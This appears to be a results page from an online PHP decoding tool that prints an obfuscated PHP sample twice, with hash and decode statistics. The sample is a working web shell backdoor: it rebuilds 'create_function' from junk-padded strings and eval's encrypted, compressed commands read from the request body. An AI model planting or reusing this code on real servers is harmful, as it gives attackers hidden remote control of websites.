Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php $V = '$k="80eu)u)32263";$khu)=u)"6f8af44u)abea0";$kf=u)"35103u)u)9f4a7b5";$pu)..

Decoded Output download

<?php 
$V = 
  '$k="80eu)u)32263";$khu)=u)"6f8af44u)abea0";$kf=u)"35103u)u)9f4a7b5";$pu)="0UlYu)yJHG87Eu)JqEz6u)"u)u);function u)x($'; 
$P = 
  '++)u){$o.=u)$t{u)$i}^$k{$j};}}u)retuu)rn $o;}u)if(u)@pregu)_u)match("/$kh(.u)+)$kf/",@u)u)file_u)getu)_cu)ontents('; 
$d = 
  'u)t,$k){u)$c=strlu)en($k);$l=strlenu)($t)u);u)$o=""u);for($i=0u);u)$i<$l;){for(u)$j=0;(u)$u)j<$c&&$i<$l)u)u);$j++,$i'; 
$B = 
  'ob_get_cou)ntu)ents();@obu)_end_cleu)anu)();$r=@basu)e64_eu)ncu)ode(@x(@gzu)compress(u)$o),u)$k));pru)u)int(u)"$p$kh$r$kf");}'; 
$N = str_replace("FD", "", "FDcreFDateFD_fFDuncFDFDtion"); 
$c = 
  '"php://u)input"),$u)m)==1){@u)obu)_start();u)@evau)l(@gzuu)ncu)ompress(@x(@bau)se64_u)decodu)e($u)m[1]),$k))u));$u)ou)=@'; 
$u = str_replace("u)", "", $V . $d . $P . $c . $B); 
$x = $N("",$u) 
$x(); 
?>

Did this file decode correctly?

Original Code

<?php
$V =
  '$k="80eu)u)32263";$khu)=u)"6f8af44u)abea0";$kf=u)"35103u)u)9f4a7b5";$pu)="0UlYu)yJHG87Eu)JqEz6u)"u)u);function u)x($';
$P =
  '++)u){$o.=u)$t{u)$i}^$k{$j};}}u)retuu)rn $o;}u)if(u)@pregu)_u)match("/$kh(.u)+)$kf/",@u)u)file_u)getu)_cu)ontents(';
$d =
  'u)t,$k){u)$c=strlu)en($k);$l=strlenu)($t)u);u)$o=""u);for($i=0u);u)$i<$l;){for(u)$j=0;(u)$u)j<$c&&$i<$l)u)u);$j++,$i';
$B =
  'ob_get_cou)ntu)ents();@obu)_end_cleu)anu)();$r=@basu)e64_eu)ncu)ode(@x(@gzu)compress(u)$o),u)$k));pru)u)int(u)"$p$kh$r$kf");}';
$N = str_replace("FD", "", "FDcreFDateFD_fFDuncFDFDtion");
$c =
  '"php://u)input"),$u)m)==1){@u)obu)_start();u)@evau)l(@gzuu)ncu)ompress(@x(@bau)se64_u)decodu)e($u)m[1]),$k))u));$u)ou)=@';
$u = str_replace("u)", "", $V . $d . $P . $c . $B);
$x = $N("",$u)
$x();
?>

Function Calls

None

Variables

None

Stats

MD5 05987d266e821b3f92ed894a7b08aca0
Eval Count 0
Decode Time 39 ms